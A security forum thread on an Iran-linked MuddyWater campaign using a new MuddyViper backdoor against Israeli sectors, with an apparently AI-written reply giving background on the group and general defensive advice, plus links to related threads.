Iran-Linked Hackers Hits Israeli Sectors with New MuddyViper Backdoor in Targeted Attacks
- Thread starter Captain Awesome
- Start date
This looks like a new development in the long-running MuddyWater activity, but I don’t have specific information about MuddyViper itself because my knowledge only goes up to late 2024, and this campaign appears to be newer than that.
That said, some context may still be useful.
Who/what is MuddyWater?
MuddyWater (also known as Mango Sandstorm, TEMP.Zagros, TA450, etc.) is a well-known Iranian-linked threat actor that has historically:
They are usually associated with:
What this MuddyViper backdoor likely implies
Without seeing the ESET write-up, I can’t describe MuddyViper’s exact capabilities, but given MuddyWater’s track record, a new backdoor typically means:
It’s also notable (but not surprising) that:
If someone is worried they may be affected
For individuals or organizations concerned about this:
For regular users on Windows
If you’re just a home user and not in one of the targeted sectors, risk is lower but good hygiene still matters:
Next step
If you want, you can paste any IOCs, technical details, or screenshots from the ESET article here (sanitized), and I can help you interpret what they mean (e.g. what a specific registry key or command does). If this is about a real incident in your environment, it would be wise to also consult your security team / IR team, or if you’re a forum user just reading, keep an eye out for the full ESET research post and any YARA/Sigma rules they may publish.
That said, some context may still be useful.
Who/what is MuddyWater?
MuddyWater (also known as Mango Sandstorm, TEMP.Zagros, TA450, etc.) is a well-known Iranian-linked threat actor that has historically:
- Targeted governments, telecoms, universities, and critical infrastructure
- Focused a lot on the Middle East, but also hit Europe, North America, and Asia
- Used a mix of custom tools and off-the-shelf remote access tools (RATs)
- Relied heavily on phishing (often with malicious documents or links)
They are usually associated with:
- Initial access via spear-phishing emails or compromised servers
- PowerShell-heavy tooling and “living off the land” (abusing built-in Windows tools)
- Backdoors with relatively simple but flexible command-and-control (C2) channels
- Follow-on activities like data exfiltration, credential theft, and lateral movement
What this MuddyViper backdoor likely implies
Without seeing the ESET write-up, I can’t describe MuddyViper’s exact capabilities, but given MuddyWater’s track record, a new backdoor typically means:
- Persistent remote access (C2 communication, command execution, file upload/download)
- Capability to deploy additional tools or ransomware/wipers at a later stage
- Focus on stealth and resiliency (multiple persistence methods, obfuscation, etc.)
It’s also notable (but not surprising) that:
- Targets are in critical and sensitive sectors: academia, engineering, utilities, technology, transportation
- There’s regional expansion: mainly Israel, but also at least one tech company in Egypt
If someone is worried they may be affected
For individuals or organizations concerned about this:
- Check the full ESET report you linked: they usually publish indicators of compromise (IOCs) (hashes, domains, IPs, file names, registry keys).
- Use those IOCs with:
- Your EDR/AV solution (custom detection rules, if supported)
- Network monitoring tools (block or monitor suspicious C2 infrastructure)
- SIEM queries (to hunt for past activity)
- Harden email and RDP exposure (MuddyWater often uses phishing and weak external services).
- Ensure logging is enabled and centralized (PowerShell, WMI, process creation, and network connections).
For regular users on Windows
If you’re just a home user and not in one of the targeted sectors, risk is lower but good hygiene still matters:
- Keep Windows and software fully up to date.
- Use a reputable security suite with real-time protection.
- Be especially careful with unsolicited email attachments or document macros.
- If you suspect compromise, scan with:
- Your main AV
- An additional on-demand scanner (e.g. Microsoft Safety Scanner, ESET Online Scanner, Kaspersky Virus Removal Tool, etc.)
Next step
If you want, you can paste any IOCs, technical details, or screenshots from the ESET article here (sanitized), and I can help you interpret what they mean (e.g. what a specific registry key or command does). If this is about a real incident in your environment, it would be wise to also consult your security team / IR team, or if you’re a forum user just reading, keep an eye out for the full ESET research post and any YARA/Sigma rules they may publish.
Seems the Iran-Israel conflict has crossed your Boundary....close proximityCollateral damage
You may also like...
-
Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor- Started by Divergent
- Replies: 1
-
Iranian APT Targets Android Users With New Variants of DCHSpy Spyware- Started by Brownie2019
- Replies: 0
-
Google Links China, Iran, Russia, North Korea to Coordinated Defense Sector Cyber Operations
- Started by Divergent
- Replies: 3
-
Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks- Started by Bot
- Replies: 1
-
FBI: Chinese State Hackers Breached U.S. Telecom Providers- Started by enaph
- Replies: 11